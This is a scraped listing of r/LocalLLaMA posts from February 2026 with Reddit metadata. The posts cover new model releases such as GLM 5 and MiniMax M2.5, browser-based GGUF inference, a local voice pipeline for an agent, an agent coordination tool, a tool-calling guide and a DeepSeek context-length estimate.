MOSS-TTS | 1 | [removed] | 2026-02-11T12:58:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r1wp5n/mosstts/ | Xiami2019 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1wp5n | false | null | t3_1r1wp5n | /r/LocalLLaMA/comments/1r1wp5n/mosstts/ | false | false | self | 1 | null |
MiniMax M2.5 Released | 258 | 2026-02-11T12:56:37 | https://www.reddit.com/r/LocalLLaMA/comments/1r1wnj9/minimax_m25_released/ | External_Mood4719 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1wnj9 | false | null | t3_1r1wnj9 | /r/LocalLLaMA/comments/1r1wnj9/minimax_m25_released/ | false | false | 258 | null | ||
GLM 5 Released | 607 | [https://chat.z.ai/](https://chat.z.ai/)
https://preview.redd.it/mvdnn18e4vig1.png?width=799&format=png&auto=webp&s=6324969f9d24fa0aeefbd5e8da2de3da0f5f948e
| 2026-02-11T12:53:30 | https://www.reddit.com/r/LocalLLaMA/comments/1r1wl6x/glm_5_released/ | External_Mood4719 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1wl6x | true | null | t3_1r1wl6x | /r/LocalLLaMA/comments/1r1wl6x/glm_5_released/ | false | false | 607 | null | |
MDST Engine: run GGUF models in your browser with WebGPU/WASM | 23 | Hey r/LocalLLaMA community!
We're excited to share our new WebGPU implementation, now supporting our favourite GGUF models!
**Quickly, who we are:**
* MDST is a free, agentic, secure, **collaborative web IDE with cloud and local WebGPU inference**.
* You keep everything synced across users' projects (GitHub or local), with E2E encryption and a GDPR-friendly setup.
* You can chat, create and edit files, run models, and collaborate from one workspace without fully depending on cloud providers.
* You can contribute to our [public WebGPU leaderboard](https://mdst.app/intro#research). We think this will accelerate research and make local LLMs more accessible for all kinds of users.
**What’s new:**
* We built a new lightweight **WASM/WebGPU engine** that runs **GGUF models in the browser.**
* From now on, you don't need any additional software to run models, just a modern browser (we already have full support for Chrome, Safari, and Edge).
* MDST right now runs **Qwen 3, Ministral 3, LFM 2.5, and Gemma 3 in any GGUF quantization**.
* We are working on mobile inference, KV caching, and stable support for larger models (like GLM 4.7 Flash, for example) and a more effective WASM64 version.
For full details on our GGUF research and future plans, current public WebGPU leaderboard, and early access, check out: [https://mdst.app/blog/mdst\_engine\_run\_gguf\_models\_in\_your\_browser](https://mdst.app/blog/mdst_engine_run_gguf_models_in_your_browser)
Thanks so much, guys, for the amazing community, we’d love to get any kind of feedback on what models or features we should add next! | 2026-02-11T12:38:02 | https://www.reddit.com/gallery/1r1w9fs | vmirnv | reddit.com | 1970-01-01T00:00:00 | 0 | {} | 1r1w9fs | false | null | t3_1r1w9fs | /r/LocalLLaMA/comments/1r1w9fs/mdst_engine_run_gguf_models_in_your_browser_with/ | false | false | 23 | null | |
Help finding a good model for my use case. | 1 | [removed] | 2026-02-11T12:02:45 | https://www.reddit.com/r/LocalLLaMA/comments/1r1vjqg/help_finding_a_good_model_for_my_use_case/ | TowerChance8849 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1vjqg | false | null | t3_1r1vjqg | /r/LocalLLaMA/comments/1r1vjqg/help_finding_a_good_model_for_my_use_case/ | false | false | self | 1 | null |
Local voice control for my AI agent - Parakeet STT + Kokoro TTS on Apple Silicon | 9 | I've been running an AI agent (OpenClaw + Claude) on a Mac Mini M4 for 2 weeks. The cloud LLM part works great but I wanted the voice interaction to be fully local and fast.
Ended up with Parakeet for STT and Kokoro for TTS, both running on Apple Silicon. Parakeet transcribes in about 240ms, Kokoro responds near instantly. No cloud dependency for the voice layer.
The difference between typing commands and just talking is massive. I went from sitting at my desk all day to working from anywhere. Balcony, walking the dog, couch. I just talk and the agent handles game deployments, server monitoring, social media, the usual stuff.
One funny thing: the STT sometimes transcribes my Greek accent saying the agent's name wrong. He started correcting me like Hermione in Harry Potter: "It's Niko, not Nico!"
Also built a 3D avatar (Mimora) as a browser extension that shows facial expressions when the agent responds. Listening, thinking, happy. Makes the whole thing feel way more natural.
Anyone else running local voice pipelines with their agents? Curious what STT/TTS combos people are using. Full setup documented at [https://myclaw.tech](https://myclaw.tech)
Thread with screenshots: [https://x.com/PlayingInCanvas/status/2021529883919405297](https://x.com/PlayingInCanvas/status/2021529883919405297) | 2026-02-11T11:56:26 | https://v.redd.it/q3zmrtl5uuig1 | leonidas_elanra | v.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1vf4e | false | null | t3_1r1vf4e | /r/LocalLLaMA/comments/1r1vf4e/local_voice_control_for_my_ai_agent_parakeet_stt/ | false | false | 9 | null |
MiniMax M2.5 is currently undergoing internal testing and is available to a small number of users | 32 | [https://x.com/rudrank/status/2021534943932031226?s=20](https://x.com/rudrank/status/2021534943932031226?s=20)
https://preview.redd.it/rzn30tyytuig1.png?width=626&format=png&auto=webp&s=361c1704ab37823746ab84fe45b4dcd3d378685a
https://preview.redd.it/1vqjp3n1uuig1.png?width=680&format=png&auto=webp&s=4c9967df4c6af84af29af6ae5272b243a6ad1693
| 2026-02-11T11:55:31 | https://www.reddit.com/r/LocalLLaMA/comments/1r1vegx/minimax_m25_is_currently_undergoing_internal/ | External_Mood4719 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1vegx | true | null | t3_1r1vegx | /r/LocalLLaMA/comments/1r1vegx/minimax_m25_is_currently_undergoing_internal/ | false | false | 32 | null | |
Zhipu is rolling out GLM 5 now! | 50 | Sauce : [https://www.businesstimes.com.sg/companies-markets/telcos-media-tech/chinas-zhipu-unveils-new-ai-model-jolting-race-deepseek](https://www.businesstimes.com.sg/companies-markets/telcos-media-tech/chinas-zhipu-unveils-new-ai-model-jolting-race-deepseek) | 2026-02-11T11:51:25 | https://www.reddit.com/r/LocalLLaMA/comments/1r1vbpi/zhipu_is_rolling_out_glm_5_now/ | NegotiationOk888 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1vbpi | false | null | t3_1r1vbpi | /r/LocalLLaMA/comments/1r1vbpi/zhipu_is_rolling_out_glm_5_now/ | false | false | self | 50 | null |
Qwen3-VL - Bounding Box Coordinate | 1 | Hey everyone,
I’ve been exploring open source models that can take an image and output bounding boxes for a specific object. I tried **Qwen-3-VL**, but the results weren’t very precise. Models like **Gemini 3** seem much better in terms of accuracy.
Does anyone know of open source alternatives or techniques that can improve bounding box precision? I’m looking for something reliable for real-world images.
Any suggestions or experiences would be really appreciated! | 2026-02-11T11:32:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r1uz9i/qwen3vl_bounding_box_coordinate/ | Impress_Soft | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1uz9i | false | null | t3_1r1uz9i | /r/LocalLLaMA/comments/1r1uz9i/qwen3vl_bounding_box_coordinate/ | false | false | self | 1 | null |
We built a simple coordination loop for agents (match → exchange → score → re-match) — curious where you’d use it | 0 | I’ve been working on a small piece of infrastructure for **agent coordination**, and I’d love to share it with people actually running agents.
The core idea is simple:
**match → exchange → score → re-match**
Agents exchange short messages and attach a score to each interaction.
Across repeated rounds, the system learns which interactions create value and makes similar ones more likely to happen again.
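A toy version of that loop in Python (the scoring and update rule here are illustrative assumptions, not the actual Hashgrid algorithm):

```python
import random

agents = ["a", "b", "c"]
weights = {}  # (agent, partner) -> accumulated exchange score

def match(agent):
    """Re-match step: partners with higher past scores are likelier picks."""
    partners = [p for p in agents if p != agent]
    w = [1.0 + weights.get((agent, p), 0.0) for p in partners]
    return random.choices(partners, weights=w)[0]

def record(agent, partner, score):
    """Score step: feed the exchange's value back into future matching."""
    weights[(agent, partner)] = weights.get((agent, partner), 0.0) + score

# One round: "a" exchanged with "b" and the interaction scored well.
record("a", "b", 5.0)
# Next match: "b" now has weight 6.0 vs "c"'s 1.0 when matching agent "a".
print(weights[("a", "b")])  # 5.0
```

The point of the sketch is only the feedback shape: the score attached to each exchange is the sole learning signal, and it biases future matching without any transcript being shared.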
A few important clarifications:
* It’s **not a chat app** and doesn’t rely on transcripts
* Nodes keep their **own memory and data locally**
* The main learning signal is the **score attached to exchanges**
We’re early, but it’s already usable for experimentation.
I’m especially curious:
* **Where in your current agent setup would coordination like this actually help?**
* **What kind of agent workflow would you try this with first?**
Short guide here if you want to see how it works:
[https://hashgrid.ai/](https://hashgrid.ai/)
Happy to answer anything — and very open to blunt feedback from people building in this space. | 2026-02-11T11:25:14 | https://www.reddit.com/r/LocalLLaMA/comments/1r1uue0/we_built_a_simple_coordination_loop_for_agents/ | Alex342RO | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1uue0 | false | null | t3_1r1uue0 | /r/LocalLLaMA/comments/1r1uue0/we_built_a_simple_coordination_loop_for_agents/ | false | false | self | 0 | null |
Tool Calling Guide for Local LLMs (Run Real Actions, Not Just Text!) | 3 | If you're running local LLMs with **llama.cpp** and want them to actually *do things* — like run Python, execute terminal commands, calculate values, or call APIs — this guide is 🔥
I just went through this incredibly detailed tutorial on **Tool Calling for Local LLMs by Unsloth AI**, and it's honestly one of the cleanest implementations I’ve seen.
Full Guide: [https://unsloth.ai/docs/basics/tool-calling-guide-for-local-llms](https://unsloth.ai/docs/basics/tool-calling-guide-for-local-llms) | 2026-02-11T11:06:22 | https://www.reddit.com/r/LocalLLaMA/comments/1r1uib3/tool_calling_guide_for_local_llms_run_real/ | techlatest_net | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1uib3 | false | null | t3_1r1uib3 | /r/LocalLLaMA/comments/1r1uib3/tool_calling_guide_for_local_llms_run_real/ | false | false | self | 3 | {'enabled': False, 'images': [{'id': 'ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM', 'resolutions': [{'height': 53, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=108&crop=smart&auto=webp&s=6fa9ec0bda4ae81d05efe9ff0a296be82987e912', 'width': 108}, {'height': 106, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=216&crop=smart&auto=webp&s=18872cd0af37e87d93cf5b6c098630c44f40a162', 'width': 216}, {'height': 157, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=320&crop=smart&auto=webp&s=e8392e0cb89db800c200421873b07e92f34150fe', 'width': 320}, {'height': 314, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=640&crop=smart&auto=webp&s=5f6fc5d8f727ab6f86a8ca5f94a5091bbe81d025', 'width': 640}, {'height': 472, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=960&crop=smart&auto=webp&s=26fa346a0f27ac195ecf2f29e1d997a534a3b283', 'width': 960}, {'height': 531, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=1080&crop=smart&auto=webp&s=4e4e7bc3c126d7465ae2f4d8fab93d8c6edd76c4', 'width': 1080}], 'source': {'height': 590, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?auto=webp&s=df3ed66f8b8e54b17c699d9c4e81b03ddeb78c58', 'width': 1200}, 'variants': {}}]} |
Grok-3 joins upcoming models list | 137 | [Tweet link](https://x.com/elonmusk/status/2020878250516341110)
First question is when? | 2026-02-11T10:41:33 | pmttyji | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1u2ne | false | null | t3_1r1u2ne | /r/LocalLLaMA/comments/1r1u2ne/grok3_joins_upcoming_models_list/ | false | false | 137 | {'enabled': True, 'images': [{'id': 'ueoiz6yrfuig1', 'resolutions': [{'height': 36, 'url': 'https://preview.redd.it/ueoiz6yrfuig1.png?width=108&crop=smart&auto=webp&s=b97f845e0cf28ddb283905ea5569642e659f3acf', 'width': 108}, {'height': 72, 'url': 'https://preview.redd.it/ueoiz6yrfuig1.png?width=216&crop=smart&auto=webp&s=e7e081de95d3300fb412e982ce7e9bd6b71b19cc', 'width': 216}, {'height': 107, 'url': 'https://preview.redd.it/ueoiz6yrfuig1.png?width=320&crop=smart&auto=webp&s=bc9154b12fb8ee19cbdde7d47a510f5ad934b95f', 'width': 320}], 'source': {'height': 204, 'url': 'https://preview.redd.it/ueoiz6yrfuig1.png?auto=webp&s=1b5ffaf37197594f464c8fe3e061a8994a951c50', 'width': 609}, 'variants': {}}]} | ||
activefence quietly rebranded to alice, anyone notice? | 1 | [removed] | 2026-02-11T10:40:16 | [deleted] | 1970-01-01T00:00:00 | 0 | {} | 1r1u1ud | false | null | t3_1r1u1ud | /r/LocalLLaMA/comments/1r1u1ud/activefence_quietly_rebranded_to_alice_anyone/ | false | false | default | 1 | null | ||
DeepSeek's new model may have a 3.2M context length, not just 1M | 7 | Source: [https://linux.do/t/topic/1605482](https://linux.do/t/topic/1605482) (Chinese text warning)
https://preview.redd.it/qm1tcv1vfuig1.png?width=432&format=png&auto=webp&s=07a3acfee34af993e4e75d9c8b98ef661f27de0a
https://preview.redd.it/lsovuy7wfuig1.png?width=978&format=png&auto=webp&s=04094fc5a5714f26fe67959dc1c28c18cd9782be
Someone tested it with a TRPG log, and it reported reading 92%. Since the log contains 3,474,617 tokens when encoded with the DeepSeek V3 tokenizer, 92% comes out to about 3,196,647. I suspect the actual usable context window is 3.2M tokens. Additionally, the summarized chronicle was highly accurate; it covered almost everything except the very end without any omissions, and its prediction for the ending was also spot on.
| 2026-02-11T10:36:49 | https://www.reddit.com/r/LocalLLaMA/comments/1r1tzub/deepseek_new_model_maybe_is_32m_context_length/ | External_Mood4719 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1tzub | false | null | t3_1r1tzub | /r/LocalLLaMA/comments/1r1tzub/deepseek_new_model_maybe_is_32m_context_length/ | false | false | 7 | null |
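The estimate above is easy to sanity-check — 92% of the log's token count, using exact integer arithmetic to avoid floating-point drift:

```python
# Reproduce the context-window estimate from the post:
# 92% of a 3,474,617-token TRPG log (DeepSeek V3 tokenizer).
log_tokens = 3_474_617
usable = log_tokens * 92 // 100  # integer percentage, no float rounding
print(usable)  # 3196647 — roughly 3.2M tokens
```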